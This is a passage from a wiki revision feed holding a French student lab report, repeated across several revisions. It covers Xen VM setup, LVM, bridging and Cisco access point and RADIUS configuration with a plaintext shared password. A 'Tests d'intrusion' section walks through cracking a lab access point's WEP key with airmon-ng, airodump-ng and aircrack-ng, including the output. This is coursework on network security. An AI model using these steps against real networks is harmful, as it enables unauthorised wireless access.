Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
'''Configuration réseau'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Configuration ssh'''&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump --encrypt wep wlan0mon&lt;br /&gt;
- Notes le SSID de la machine à attaquer, ici cracotte03 : 04:DA:D2:9C:50:53&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-01.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
&lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56349</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56349"/>
				<updated>2021-11-12T11:00:53Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Tests d'intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
'''Configuration réseau'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Configuration ssh'''&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump --encrypt wep wlan0mon&lt;br /&gt;
- Notes le SSID de la machine à attaquer, ici cracotte03 : 04:DA:D2:9C:50:53&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-01.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56347</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56347"/>
				<updated>2021-11-12T10:47:09Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Configuration de la liaison routeur 3500 vers 9200 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
'''Configuration réseau'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Configuration ssh'''&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
